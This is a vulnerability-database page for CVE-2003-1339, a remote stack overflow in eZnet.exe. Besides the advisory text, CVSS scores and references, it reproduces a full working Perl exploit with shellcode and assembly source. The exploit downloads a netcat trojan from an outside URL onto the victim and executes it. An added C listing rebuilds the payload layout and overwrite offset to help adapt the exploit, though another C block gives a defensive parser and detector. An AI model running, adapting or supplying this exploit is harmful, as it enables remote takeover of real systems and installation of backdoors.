CVE-2003-1339
CVSS 10.0
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 00:00:00

[Original] Stack-based buffer overflow in eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork, and (d) eZshare allows remote attackers to cause a denial of service (crash) or execute arbitrary code, as demonstrated via (1) a long GET request and (2) a long operation or autologin parameter to SwEzModule.dll.


[CNNVD] EZmeeting buffer overflow vulnerability (CNNVD-200312-279)

eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork and (d) eZshare, contains a stack-based buffer overflow. A remote attacker can cause a denial of service (crash) or execute arbitrary code by sending (1) an over-long GET request or (2) an over-long operation or autologin parameter to SwEzModule.dll.
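The trigger named above (a long GET, or a long operation/autologin value handed to SwEzModule.dll) is the classic CWE-119 shape: a query value copied into a fixed stack buffer with no bound. The C below is an added example, not eZ's code and not from the advisory or the exploit. It shows a bounded parser that refuses an over-long value (with the unbounded copy it replaces shown in a comment), plus a request-line check that reports the longest query value so a proxy filter or log review can flag the trigger. The 64-byte field size, the struct layout and the two sample requests are constructed for illustration; eZnet's real buffer size is not on record on this page.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 64   /* assumed fixed field size; not eZnet's real value */

struct login_req {
    char operation[FIELD_MAX];
    char autologin[FIELD_MAX];
};

/* One query value runs to the next '&' or to the space before "HTTP/". */
static size_t value_len(const char *v)
{
    return strcspn(v, "& \r\n");
}

/* Find "name=" at a parameter boundary; returns the value or NULL. */
static const char *find_param(const char *query, const char *name)
{
    size_t nl = strlen(name);
    const char *p = query;

    while (p && *p) {
        if (strncmp(p, name, nl) == 0 && p[nl] == '=')
            return p + nl + 1;
        p = strchr(p, '&');
        if (p)
            p++;
    }
    return NULL;
}

/* The vulnerable shape is an unbounded copy into the fixed field, i.e.
 *     strcpy(out->autologin, al);   // 4000+ bytes walk over the saved EIP
 * This bounded version refuses the value instead of truncating it, so an
 * over-long credential is an error rather than a partially accepted login. */
static int copy_value(char *dst, size_t dstsz, const char *src)
{
    size_t n = value_len(src);

    if (n >= dstsz)
        return -1;              /* value plus terminator would not fit */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Parse "GET /SwEzModule.dll?operation=...&autologin=... HTTP/1.0".
 * 0 = ok, -1 = not that request shape, -2 = a value exceeds its field. */
int parse_login_request(const char *reqline, struct login_req *out)
{
    static const char prefix[] = "GET /SwEzModule.dll?";
    const char *q, *op, *al;

    if (strncmp(reqline, prefix, sizeof prefix - 1) != 0)
        return -1;
    q = reqline + (sizeof prefix - 1);
    op = find_param(q, "operation");
    al = find_param(q, "autologin");
    if (!op || !al)
        return -1;
    if (copy_value(out->operation, sizeof out->operation, op) < 0 ||
        copy_value(out->autologin, sizeof out->autologin, al) < 0)
        return -2;
    return 0;
}

/* Verdict only, for callers that do not need the fields. */
int parse_status(const char *reqline)
{
    struct login_req r;
    return parse_login_request(reqline, &r);
}

/* Detection side: longest query value in a request line. A few hundred bytes
 * to SwEzModule.dll is already suspicious; the public exploit sends thousands. */
size_t longest_query_value(const char *reqline)
{
    const char *p = strchr(reqline, '?');
    size_t longest = 0;

    if (!p)
        return 0;
    for (p++;;) {
        size_t plen = strcspn(p, "& \r\n");          /* one name=value token */
        const char *eq = memchr(p, '=', plen);
        size_t vlen = eq ? (size_t)(p + plen - eq - 1) : 0;

        if (vlen > longest)
            longest = vlen;
        if (p[plen] != '&')                           /* end of the query string */
            break;
        p += plen + 1;
    }
    return longest;
}

/* Constructed sample requests (not captured traffic). */
const char *sample_benign(void)
{
    return "GET /SwEzModule.dll?operation=login&autologin=user1 HTTP/1.0";
}

/* Same shape as the public exploit: a 4000-byte autologin value. */
const char *sample_oversize(void)
{
    static char buf[4200];

    if (buf[0] == '\0') {
        static const char head[] = "GET /SwEzModule.dll?operation=login&autologin=";
        static const char tail[] = " HTTP/1.0";
        size_t hl = sizeof head - 1;

        memcpy(buf, head, hl);
        memset(buf + hl, 'A', 4000);
        memcpy(buf + hl + 4000, tail, sizeof tail);   /* includes the NUL */
    }
    return buf;
}

int main(void)
{
    struct login_req r;
    int rc = parse_login_request(sample_benign(), &r);

    printf("benign: rc=%d operation=%s autologin=%s longest=%zu\n",
           rc, r.operation, r.autologin, longest_query_value(sample_benign()));
    printf("oversize: rc=%d longest=%zu\n",
           parse_status(sample_oversize()), longest_query_value(sample_oversize()));
    return 0;
}
```

The detector deliberately measures the value, not the whole line: the exploit's request line is long mainly because of one parameter, and a threshold on a single value survives legitimate long URLs with many short parameters.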

- CVSS (base score)

CVSS score: 10.0 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be brought down completely]
Access complexity: LOW [no special conditions are needed to exploit]
Access vector: NETWORK [the attacker needs neither local nor adjacent-network access]
Authentication: NONE [no authentication is required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:ezmeeting:ezmeeting:3.5
cpe:/a:ezmeeting:ezmeeting:3.4
cpe:/a:ezmeeting:ezmeeting:3.3

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1339
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1339
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-279
(official data source) CNNVD

- Other links and resources

http://www.milw0rm.com/exploits/133
(UNKNOWN)  MILW0RM  133
http://www.governmentsecurity.org/archive/t5390.html
(UNKNOWN)  MISC  http://www.governmentsecurity.org/archive/t5390.html
http://securitytracker.com/id?1008412
(UNKNOWN)  SECTRACK  1008412
http://seclists.org/bugtraq/2003/Dec/0195.html
(UNKNOWN)  BUGTRAQ  20031211 eZ and eZphotoshare fixes
http://marc.info/?l=bugtraq&m=107090390002654&w=2
(UNKNOWN)  BUGTRAQ  20031207 eZ Multiple Packages Stack Overflow Vulnerability

- Vulnerability information

EZmeeting buffer overflow vulnerability
Critical  Buffer overflow
2003-12-31 00:00:00  2007-09-26 00:00:00
Remote
eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork and (d) eZshare, contains a stack-based buffer overflow. A remote attacker can cause a denial of service (crash) or execute arbitrary code by sending (1) an over-long GET request or (2) an over-long operation or autologin parameter to SwEzModule.dll.

- Advisories and patches

        

- Vulnerability information (133)

Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit (EDBID:133)
Platform: windows   Type: remote
Date: 2003-12-15   Verified
Port: 80   Author: Peter Winter-Smith
N/A
#!/usr/bin/perl -w
# 
# Stack Overflow in eZnet.exe - Remote Exploit
# 
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
# 
# For this exploit I have tried several strategies to increase
# reliability and performance:
# 
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
# 
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
      " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
      " + listens on port 9999.\n\n";
exit;
}

print "eZnet.exe remote trojan downloader exploit\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port 80";

$tlen = chr(length($ARGV[1]) + 1);

$shellcode =            "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
                        "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
                        "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
                        "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
                        "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
                        "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
                        $tlen  .   # disp8 for 'lea edi,[edi+N]' over the URL (length + 1), see vampiric.asm
                            "\x57\x8D\x7F\x09\x47\x57\x8D" .
                        "\x54\x24\x14\x52\xEB\x02\xEB\x52" .
                        "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
                        "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
                        "\x36\x50\xFF\x15\xCC\x90\x04\x10" .
                        "\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
                        "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
                        "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
                        "\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
                        "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
                        "\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
                        "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
                        "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
                        "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
                        "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
                        "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
                        "\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
                        "\x45\x78\x65\x63\xFF" .  $ARGV[1] .
                                                    "\xFF" .
                        "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
                        "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
                        "\x33\x32\x2E\x64\x6C\x6C\xFF";

$jmpcode =              "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";

$eip = "\xBB\x33\x05\x10";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  # padding shrinks as the URL grows, so $eip always lands at the same offset;
  # the 20 NOPs and $jmpcode after it sit where 'call esp' transfers control
  "\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
                  
print $victim $packet;

print " + Making Request ...\n + Trojan should download - best of luck!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ;   (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# 
# bits 32
# 
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [100490cch]	; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [100490cch]	; GetProcAddress("kernel32.dll", WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------

#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [peter4020@hotmail.com]
# 
# ;100533BBh
# 
# bits 32
# 
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------




# milw0rm.com [2003-12-15]
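The payload layout the Perl script and its asm comments describe, as an added example in C (not part of the milw0rm exploit and not eZ code): it rebuilds the 0xFF-terminated string table, checks that the blob is NUL-free, computes the disp8 for each `lea edi,[edi+N]` that the comments tell you to patch by hand when the URL changes, replays the nullify loop, and shows that the return-address overwrite lands at a fixed offset because the padding is 4375 - len(url). The 213-byte figure is my count of the URL-independent bytes in the `$shellcode` string ($tlen included); the 126-character ceiling on each string comes from the disp8 in the `8D 7F xx` encoding being sign-extended, so a step of 128 or more would move edi backwards rather than forwards.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The string table in the order the shellcode pushes it; the URL slot is
 * filled by the caller, as $ARGV[1] is in the Perl. */
static const char *const table[] = {
    "URLMON.DLL", "URLDownloadToFileA", "WinExec",
    NULL /* URL */, "c:\\nc.exe", "kernel32.dll"
};
#define NTABLE (sizeof table / sizeof table[0])

/* Layout constants taken from the Perl: 65 NOPs, 213 shellcode bytes that do
 * not depend on the URL (counted from the $shellcode string, $tlen included),
 * and "a" x (4375 - len(url)) of padding before $eip. */
#define NOP_SLED        65
#define SHELLCODE_FIXED 213
#define PAD_BASE        4375

/* disp8 for 'lea edi,[edi+disp8]' (8D 7F xx) stepping over s and its
 * terminator. disp8 is sign-extended, so 128..255 would step backwards;
 * anything that does not fit in 1..127 is refused with -1. */
int lea_disp(const char *s)
{
    size_t n = strlen(s) + 1;
    return n > 127 ? -1 : (int)n;
}

/* Emit the table with 0xFF where each string's NUL would be, so the blob
 * survives a NUL-terminated copy in the target. Returns bytes written, or 0
 * if a string cannot be reached with disp8 or the buffer is too small. */
size_t build_table(uint8_t *out, size_t outsz, const char *url)
{
    size_t off = 0;
    for (size_t i = 0; i < NTABLE; i++) {
        const char *s = table[i] ? table[i] : url;
        size_t n = strlen(s);
        if (lea_disp(s) < 0 || off + n + 1 > outsz)
            return 0;
        memcpy(out + off, s, n);
        out[off + n] = 0xFF;
        off += n + 1;
    }
    return off;
}

/* 1 if no byte of blob is 0x00. */
int is_nul_free(const uint8_t *blob, size_t n)
{
    return memchr(blob, 0, n) == NULL;
}

/* C rendering of the 'nullify' loop: repne scasb stops after each 0xFF and
 * 'inc byte [edi-1]' wraps it to 0x00. Runs 'count' times (6 in the asm). */
size_t nullify(uint8_t *blob, size_t n, size_t count)
{
    size_t patched = 0;
    for (size_t i = 0; i < n && patched < count; i++)
        if (blob[i] == 0xFF) {
            blob[i] = 0x00;
            patched++;
        }
    return patched;
}

/* Build, verify NUL-freedom, decode in place, and check that every string
 * comes back intact. Returns 1 on success. */
int table_roundtrip(const char *url)
{
    uint8_t blob[512];
    size_t n = build_table(blob, sizeof blob, url), off = 0;
    if (n == 0 || !is_nul_free(blob, n) || nullify(blob, n, NTABLE) != NTABLE)
        return 0;
    for (size_t i = 0; i < NTABLE; i++) {
        const char *s = table[i] ? table[i] : url;
        if (strcmp((const char *)blob + off, s) != 0)
            return 0;
        off += strlen(s) + 1;
    }
    return off == n;
}

/* Offset, from the first byte of the autologin value, of the 4 bytes that
 * overwrite the saved return address. The padding shrinks as the URL grows,
 * so the offset is the same for every URL up to PAD_BASE bytes. */
size_t eip_offset(size_t url_len)
{
    if (url_len > PAD_BASE)
        return 0;
    return NOP_SLED + SHELLCODE_FIXED + url_len + (PAD_BASE - url_len);
}

int main(void)
{
    const char *url = "http://www.elitehaven.net/ncat.exe";
    printf("lea disp for URL: %d, table round-trips: %d, saved EIP at +%zu\n",
           lea_disp(url), table_roundtrip(url), eip_offset(strlen(url)));
    return 0;
}
```

The displacements this computes for the stock strings (11, 19, 8, 35, 10) are the ones the asm comments carry, which is a quick way to confirm a patched string table before sending anything.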
		

- Vulnerability information

60387
eZ Multiple Products eZnet.exe GET Request Handling Remote Overflow
Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-12-07 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Discoverer

Unknown or Incomplete
 

 
